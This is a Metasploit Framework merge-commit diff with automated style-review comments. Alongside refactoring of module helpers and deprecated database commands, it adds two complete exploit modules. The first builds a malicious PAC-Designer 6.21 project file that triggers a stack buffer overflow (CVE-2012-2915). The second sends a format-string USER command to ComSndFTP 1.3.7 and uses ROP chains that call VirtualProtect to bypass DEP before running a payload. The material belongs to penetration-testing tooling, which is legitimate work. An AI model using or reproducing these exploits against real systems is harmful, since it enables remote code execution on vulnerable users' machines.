Merge branch 'master' into feature/vuln-info
commit
8177783681
|
@ -40,11 +40,12 @@ module Auxiliary
|
|||
# Whether or not the exploit should be run in the context of a background
|
||||
# job.
|
||||
#
|
||||
def self.run_simple(omod, opts = {})
|
||||
def self.run_simple(omod, opts = {}, &block)
|
||||
|
||||
# Clone the module to prevent changes to the original instance
|
||||
mod = omod.replicant
|
||||
Msf::Simple::Framework.simplify_module( mod, false )
|
||||
yield(mod) if block_given?
|
||||
|
||||
# Import options from the OptionStr or Option hash.
|
||||
mod._import_extra_options(opts)
|
||||
|
@ -80,6 +81,7 @@ module Auxiliary
|
|||
self.job_run_proc(ctx)
|
||||
self.job_cleanup_proc(ctx)
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
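Review bot: The new `&block` parameter on `run_simple` is never referenced; the body dispatches through `yield(mod) if block_given?`, so the explicit parameter only materialises a Proc on each call and can be dropped (`def self.run_simple(omod, opts = {})` with the `yield` kept), or the yield should use it (`block.call(mod) if block`) if the signature is meant to advertise the block. The block is also yielded the replicant before `mod._import_extra_options(opts)` runs, so an option the block sets that `opts` also carries is presumably overwritten by the later import; that ordering deserves a line in the method comment, e.g. `# The block receives the cloned module before opts are imported; options it sets that also appear in opts are overwritten.` The same pattern is added in `Exploit.exploit_simple`, `Payload.generate_simple` and `Post.run_simple` below. The rest of `run_simple` lies outside the hunk.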
@ -54,14 +54,14 @@ module Exploit
|
|||
# Whether or not the exploit should be run in the context of a background
|
||||
# job.
|
||||
#
|
||||
def self.exploit_simple(oexploit, opts)
|
||||
def self.exploit_simple(oexploit, opts, &block)
|
||||
# Trap and print errors here (makes them UI-independent)
|
||||
begin
|
||||
|
||||
# Clone the module to prevent changes to the original instance
|
||||
exploit = oexploit.replicant
|
||||
Msf::Simple::Framework.simplify_module( exploit, false )
|
||||
|
||||
yield(exploit) if block_given?
|
||||
|
||||
# Import options from the OptionStr or Option hash.
|
||||
exploit._import_extra_options(opts)
|
||||
|
|
|
@ -40,11 +40,12 @@ module Payload
|
|||
# NoKeyError => No valid encoder key could be found
|
||||
# ArgumentParseError => Options were supplied improperly
|
||||
#
|
||||
def self.generate_simple(payload, opts)
|
||||
def self.generate_simple(payload, opts, &block)
|
||||
|
||||
# Clone the module to prevent changes to the original instance
|
||||
payload = payload.replicant
|
||||
Msf::Simple::Framework.simplify_module(payload)
|
||||
yield(payload) if block_given?
|
||||
|
||||
# Import any options we may need
|
||||
payload._import_extra_options(opts)
|
||||
|
|
|
@ -36,11 +36,12 @@ module Post
|
|||
# Whether or not the module should be run in the context of a background
|
||||
# job.
|
||||
#
|
||||
def self.run_simple(omod, opts = {})
|
||||
def self.run_simple(omod, opts = {}, &block)
|
||||
|
||||
# Clone the module to prevent changes to the original instance
|
||||
mod = omod.replicant
|
||||
Msf::Simple::Framework.simplify_module( mod, false )
|
||||
yield(mod) if block_given?
|
||||
|
||||
# Import options from the OptionStr or Option hash.
|
||||
mod._import_extra_options(opts)
|
||||
|
|
|
@ -52,6 +52,17 @@ class Db
|
|||
base.merge(more)
|
||||
end
|
||||
|
||||
def deprecated_commands
|
||||
[
|
||||
"db_autopwn",
|
||||
"db_driver",
|
||||
"db_hosts",
|
||||
"db_notes",
|
||||
"db_services",
|
||||
"db_vulns",
|
||||
]
|
||||
end
|
||||
|
||||
#
|
||||
# Returns true if the db is connected, prints an error and returns
|
||||
# false if not.
|
||||
|
@ -1073,15 +1084,44 @@ class Db
|
|||
}
|
||||
end
|
||||
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_hosts_help; deprecated_help(:hosts); end
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_notes_help; deprecated_help(:notes); end
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_vulns_help; deprecated_help(:vulns); end
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_services_help; deprecated_help(:services); end
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_autopwn_help; deprecated_help; end
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_driver_help; deprecated_help; end
|
||||
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_hosts(*args); deprecated_cmd(:hosts, *args); end
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_notes(*args); deprecated_cmd(:notes, *args); end
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_vulns(*args); deprecated_cmd(:vulns, *args); end
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_services(*args); deprecated_cmd(:services, *args); end
|
||||
# :category: Deprecated Commands
|
||||
def cmd_db_autopwn(*args); deprecated_cmd; end
|
||||
|
||||
# :category: Deprecated Commands
|
||||
#
|
||||
# Determine if an IP address is inside a given range
|
||||
# This one deserves a little more explanation than standard deprecation
|
||||
# warning, so give the user a better understanding of what's going on.
|
||||
#
|
||||
def range_include?(ranges, addr)
|
||||
ranges.each do |range|
|
||||
return true if range.include? addr
|
||||
end
|
||||
false
|
||||
def cmd_db_driver(*args)
|
||||
deprecated_cmd
|
||||
print_line
|
||||
print_line "Because Metasploit no longer supports databases other than the default"
|
||||
print_line "PostgreSQL, there is no longer a need to set the driver. Thus db_driver"
|
||||
print_line "is not useful and its functionality has been removed. Usually Metasploit"
|
||||
print_line "will already have connected to the database; check db_status to see."
|
||||
print_line
|
||||
cmd_db_status
|
||||
end
|
||||
|
||||
def cmd_db_import_tabs(str, words)
|
||||
|
|
|
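Review bot: `deprecated_commands` builds a fresh Array literal on every call, and the dispatch change in `DispatcherShell` calls `dispatcher.deprecated_commands.include?(method)` for each command line that is not found in `commands`, so a frozen constant is the idiomatic shape: `DEPRECATED_COMMANDS = %w[db_autopwn db_driver db_hosts db_notes db_services db_vulns].freeze` and `def deprecated_commands; DEPRECATED_COMMANDS; end`. As a style point, `cmd_db_autopwn(*args)` and `cmd_db_driver(*args)` accept arguments they never read; the splat is needed for the command interface, but naming it `*_args` signals that to the reader. The `deprecated_cmd` calls in `cmd_db_driver` rely on the backtrace-parsing helper defined in `DispatcherShell`, whose failure mode is raised in that section.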
@ -35,11 +35,23 @@ module DispatcherShell
|
|||
#
|
||||
# Returns nil for an empty set of commands.
|
||||
#
|
||||
# This method should be overridden
|
||||
# This method should be overridden to return a Hash with command
|
||||
# names for keys and brief help text for values.
|
||||
#
|
||||
def commands
|
||||
end
|
||||
|
||||
#
|
||||
# Returns an empty set of commands.
|
||||
#
|
||||
# This method should be overridden if the dispatcher has commands that
|
||||
# should be treated as deprecated. Deprecated commands will not show up in
|
||||
# help and will not tab-complete, but will still be callable.
|
||||
#
|
||||
def deprecated_commands
|
||||
[]
|
||||
end
|
||||
|
||||
#
|
||||
# Wraps shell.print_error
|
||||
#
|
||||
|
@ -75,6 +87,33 @@ module DispatcherShell
|
|||
shell.print(msg)
|
||||
end
|
||||
|
||||
#
|
||||
# Print a warning that the called command is deprecated and optionally
|
||||
# forward to the replacement +method+ (useful for when commands are
|
||||
# renamed).
|
||||
#
|
||||
def deprecated_cmd(method=nil, *args)
|
||||
cmd = caller[0].match(/`cmd_(.*)'/)[1]
|
||||
print_error "The #{cmd} command is DEPRECATED"
|
||||
if cmd == "db_autopwn"
|
||||
print_error "See http://r-7.co/xY65Zr instead"
|
||||
elsif method and self.respond_to?("cmd_#{method}")
|
||||
print_error "Use #{method} instead"
|
||||
self.send("cmd_#{method}", *args)
|
||||
end
|
||||
end
|
||||
|
||||
def deprecated_help(method=nil)
|
||||
cmd = caller[0].match(/`cmd_(.*)_help'/)[1]
|
||||
print_error "The #{cmd} command is DEPRECATED"
|
||||
if cmd == "db_autopwn"
|
||||
print_error "See http://r-7.co/xY65Zr instead"
|
||||
elsif method and self.respond_to?("cmd_#{method}_help")
|
||||
print_error "Use 'help #{method}' instead"
|
||||
self.send("cmd_#{method}_help")
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Wraps shell.update_prompt
|
||||
#
|
||||
|
@ -337,7 +376,7 @@ module DispatcherShell
|
|||
next if not dispatcher.respond_to?('commands')
|
||||
|
||||
begin
|
||||
if (dispatcher.commands.has_key?(method))
|
||||
if (dispatcher.commands.has_key?(method) or dispatcher.deprecated_commands.include?(method))
|
||||
self.on_command_proc.call(line.strip) if self.on_command_proc
|
||||
run_command(dispatcher, method, arguments)
|
||||
found = true
|
||||
|
|
|
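Review bot: `deprecated_cmd` and `deprecated_help` index the result of `caller[0].match(...)` without checking it, so a call from a frame whose label does not contain `cmd_…'` (a non-`cmd_` caller, or a Ruby whose backtrace label format differs from the backtick-and-quote form the regex expects) raises NoMethodError on nil rather than reporting the deprecation. Guard the match, e.g. `m = caller[0].match(/`cmd_(.*)'/)` / `return print_error("deprecated_cmd called outside a cmd_* method") unless m` / `cmd = m[1]`, and mirror it in `deprecated_help` with its `_help` regex. Two smaller points in the same hunk: `method and self.respond_to?(...)` should be `&&` (precedence), and `self.send("cmd_#{method}", *args)` would be better as `public_send`, which documents that only the public command interface is meant to be reachable from here. The dispatch hunk further down only consults `deprecated_commands` when `commands.has_key?(method)` is false, so the extra lookup is skipped on the common path.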
@ -18,6 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::WmapModule
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
|
|
|
@ -0,0 +1,109 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer
|
||||
6.21. As a .pac file, when supplying a long string of data to the 'value' field
|
||||
under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption
|
||||
on the stack, which results in arbitrary code execution under the context of the
|
||||
user.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Unknown', #Discovery
|
||||
'juan vazquez', #Metasploit
|
||||
'sinn3r' #Metasploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2012-2915'],
|
||||
['OSVDB', '82001'],
|
||||
['EDB', '19006'],
|
||||
['BID', '53566'],
|
||||
['URL', 'http://secunia.com/advisories/48741']
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x00\x3c\x3e",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'ExitFunction' => "seh"
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'PAC-Designer 6.21 on Windows XP SP3',
|
||||
{
|
||||
# P/P/R in PACD621.exe
|
||||
# ASLR: False, Rebase: False, SafeSEH: False, OS: False
|
||||
'Ret' => 0x00805020
|
||||
}
|
||||
],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "May 16 2012",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [true, 'The filename', 'msf.pac'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
# The payload is placed in the <title> field
|
||||
p = payload.encoded
|
||||
|
||||
# The trigger is placed in the <value> field, which will jmp to our
|
||||
# payload in the <title> field.
|
||||
buf = "\x5f" #POP EDI
|
||||
buf << "\x5f" #POP EDI
|
||||
buf << "\x5c" #POP ESP
|
||||
buf << "\x61"*6 #POPAD x 6
|
||||
buf << "\x51" #PUSH ECX
|
||||
buf << "\xc3" #RET
|
||||
buf << rand_text_alpha(96-buf.length, payload_badchars)
|
||||
buf << "\xeb\x9e#{rand_text_alpha(2, payload_badchars)}" #Jmp back to the beginning of the buffer
|
||||
buf << [target.ret].pack('V')[0,3] # Partial overwrite
|
||||
|
||||
xml = %Q|<?xml version="1.0"?>
|
||||
<PacDesignData>
|
||||
<DocFmtVersion>1</DocFmtVersion>
|
||||
<DeviceType>ispPAC-CLK5410D</DeviceType>
|
||||
<CreatedBy>PAC-Designer 6.21.1336</CreatedBy>
|
||||
<SummaryInformation>
|
||||
<Title>#{p}</Title>
|
||||
<Author>#{Rex::Text.rand_text_alpha(6)}</Author>
|
||||
</SummaryInformation>
|
||||
|
||||
<SymbolicSchematicData>
|
||||
<Symbol>
|
||||
<SymKey>153</SymKey>
|
||||
<NameText>Profile 0 Ref Frequency</NameText>
|
||||
<Value>#{buf}</Value>
|
||||
</Symbol>
|
||||
</SymbolicSchematicData>
|
||||
</PacDesignData>|
|
||||
|
||||
file_create(xml)
|
||||
end
|
||||
end
|
||||
|
|
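Review bot: Inside `exploit` the module uses the mixin helper `rand_text_alpha(...)` for the buffer but the fully qualified `Rex::Text.rand_text_alpha(6)` for the `<Author>` element; pick one form for consistency (the mixin call is what the rest of the method uses). The `96` in `rand_text_alpha(96-buf.length, payload_badchars)` is an undocumented magic number; a comment stating what that 96-byte boundary corresponds to in the target's layout would let a maintainer re-derive it. Spacing is also uneven (`"\x61"*6`, `96-buf.length` versus `[target.ret].pack('V')[0,3]`); the style guide puts spaces around binary operators.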
@ -0,0 +1,202 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'ComSndFTP v1.3.7 Beta USER Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially
|
||||
crafted format string specifier as a username. The crafted username is sent to to the server to
|
||||
overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer
|
||||
is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.
|
||||
The SEH exit function is preferred so that the administrators are not left with an unhandled
|
||||
exception message. When using the meterpreter payload, the process will never die, allowing
|
||||
for continuous exploitation.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'ChaoYi Huang <ChaoYi.Huang[at]connect.polyu.hk>', # vuln discovery + poc
|
||||
'rick2600 <rick2600[at]corelan.be>', # msf module (target XP)
|
||||
'mr_me <mr_me[at]@corelan.be>', # msf module (target 23k)
|
||||
'corelanc0d3r <peter.ve[at]corelan.be>' # msf module
|
||||
],
|
||||
'Arch' => [ ARCH_X86 ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
# When a DoS is NOT a DoS
|
||||
[ 'EDB', '19024']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh'
|
||||
},
|
||||
'Platform' => ['win'],
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00\x0a\x0d",
|
||||
'StackAdjustment' => -3500,
|
||||
'DisableNops' => 'True'
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
'Windows XP SP3 - English',
|
||||
{
|
||||
'Functionpointer' => 0x71AC4050, # winsock pointer
|
||||
'Functionaddress' => 0x71AB2636, # the repair address
|
||||
'Pivot' => 0x00408D16, # 0x004093AE-0x698 add esp, 72c ; retn
|
||||
'Pad' => 568
|
||||
}
|
||||
],
|
||||
[
|
||||
'Windows Server 2003 - English',
|
||||
{
|
||||
'Functionpointer' => 0x71C14044, # winsock pointer
|
||||
'Functionaddress' => 0x71C02661, # the repair address
|
||||
'Pivot' => 0x00408D16, # 0x004093AE-0x698 add esp, 72c ; retn
|
||||
'Pad' => 568
|
||||
}
|
||||
]
|
||||
],
|
||||
'DisclosureDate' => 'Jun 08 2012'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(21),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
banner = sock.get(-1,3)
|
||||
validate = "\x32\x32\x30\x20\xbb\xb6\xd3\xad\xb9"
|
||||
validate << "\xe2\xc1\xd9\x46\x54\x50\xb7\xfe\xce"
|
||||
validate << "\xf1\xc6\xf7\x21\x0d\x0a"
|
||||
disconnect
|
||||
|
||||
if (banner == validate)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def junk(n=4)
|
||||
return rand_text_alpha(n).unpack("V").first
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
rop = ''
|
||||
if target.name =~ /Server 2003/
|
||||
# C:\WINDOWS\system32\msvcrt.dll v7.0.3790.3959
|
||||
rop = [
|
||||
0x77be3adb, # pop eax ; retn
|
||||
0x77ba1114, # <- *&VirtualProtect()
|
||||
0x77bbf244, # mov eax,[eax] ; pop ebp ; retn
|
||||
junk,
|
||||
0x77bb0c86, # xchg eax,esi ; retn
|
||||
0x77be3adb, # pop eax ; retn
|
||||
0xFFFFFBFF, # dwSize
|
||||
0x77BAD64D, # neg eax ; pop ebp ; retn
|
||||
junk,
|
||||
0x77BBF102, # xchg eax,ebx ; add [eax],al ; retn
|
||||
0x77bbfc02, # pop ecx ; retn
|
||||
0x77bef001, # ptr that is w+
|
||||
0x77bd8c04, # pop edi ; retn
|
||||
0x77bd8c05, # retn
|
||||
0x77be3adb, # pop eax ; retn
|
||||
0xFFFFFFC0, # flNewProtect
|
||||
0x77BAD64D, # neg eax ; pop ebp ; retn
|
||||
0x77be2265, # ptr to 'push esp ; ret'
|
||||
0x77BB8285, # xchg eax,edx ; retn
|
||||
0x77be3adb, # pop eax ; retn
|
||||
0x90909090, # nops
|
||||
0x77be6591, # pushad ; add al,0ef ; retn
|
||||
].pack("V*")
|
||||
|
||||
elsif target.name =~ /XP SP3/
|
||||
# C:\WINDOWS\system32\msvcrt.dll v7.0.2600.5512
|
||||
rop = [
|
||||
0x77C21D16, # pop eax ; retn
|
||||
0x77C11120, # <- *&VirtualProtect()
|
||||
0x77C2E493, # mov eax,[eax] ; pop ebp ; retn
|
||||
junk,
|
||||
0x77C21891, # pop esi ; retn
|
||||
0x77C5D010, # ptr that is w+
|
||||
0x77C2DD6C, # xchg eax,esi ; add [eax],al; retn
|
||||
0x77C21D16, # pop eax ; retn
|
||||
0xFFFFFBFF, # dwSize
|
||||
0x77C1BE18, # neg eax ; pop ebp ; retn
|
||||
junk,
|
||||
0x77C2362C, # pop ebx ; retn
|
||||
0x77C5D010, # ptr that is w+
|
||||
0x77C2E071, # xchg eax,ebx ; add [eax],al ; retn
|
||||
0x77C1F519, # pop ecx ; retn
|
||||
0x77C5D010, # ptr that is w+
|
||||
0x77C23B47, # pop edi ; retn
|
||||
0x77C23B48, # retn
|
||||
0x77C21D16, # pop eax ; retn
|
||||
0xFFFFFFC0, # flNewProtect
|
||||
0x77C1BE18, # neg eax ; pop ebp ; retn
|
||||
0x77C35459, # ptr to 'push esp ; ret'
|
||||
0x77C58FBC, # xchg eax,edx ; retn
|
||||
0x77C21D16, # pop eax ; retn
|
||||
0x90909090, # nops
|
||||
0x77C567F0, # pushad ; add al,0ef ; retn
|
||||
].pack("V*")
|
||||
end
|
||||
|
||||
stage1 = %Q{
|
||||
mov eax, #{target['Functionpointer']}
|
||||
mov ecx, #{target['Functionaddress']}
|
||||
mov [eax], ecx
|
||||
}
|
||||
|
||||
offset_wp = rand_text_alphanumeric(1)
|
||||
pivot = target['Pivot']
|
||||
offset = target['Pad'] + rop.length + stage1.length + payload.encoded.length
|
||||
|
||||
attackstring = rand_text_alphanumeric(7)
|
||||
attackstring << [target['Functionpointer']].pack('V')
|
||||
attackstring << "%#{pivot}x" # special pointer to our pivot
|
||||
attackstring << "%p" * 208 + "#{offset_wp }%n" # format specifiers to read and write the function pointer
|
||||
attackstring << rand_text_alphanumeric(target['Pad'])
|
||||
attackstring << rop
|
||||
attackstring << Metasm::Shellcode.assemble(Metasm::Ia32.new, stage1).encode_string
|
||||
attackstring << payload.encoded
|
||||
attackstring << rand_text_alphanumeric(2000 - offset)
|
||||
attackstring << "\r\n"
|
||||
|
||||
sploit = "USER #{attackstring}\r\n"
|
||||
|
||||
print_status("Triggering overflow...")
|
||||
connect
|
||||
sock.get_once(1024)
|
||||
sock.put(sploit)
|
||||
select(nil, nil, nil, 2)
|
||||
handler
|
||||
disconnect
|
||||
|
||||
end
|
||||
|
||||
end
|
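Review bot: `'DisableNops' => 'True'` sets a String where a boolean is conventionally used for this key in the framework; it works only because any non-nil String is truthy in Ruby, so `'DisableNops' => true` states the intent correctly. In `check`, the expected banner is an opaque byte literal; a comment such as `# exact "220 …\r\n" greeting bytes emitted by the vulnerable build` would tell a maintainer what is being compared, and the explicit `return` statements in `check` and `junk` are not idiomatic. In `exploit`, `select(nil, nil, nil, 2)` is a sleep in disguise; `sleep(2)` says the same thing directly.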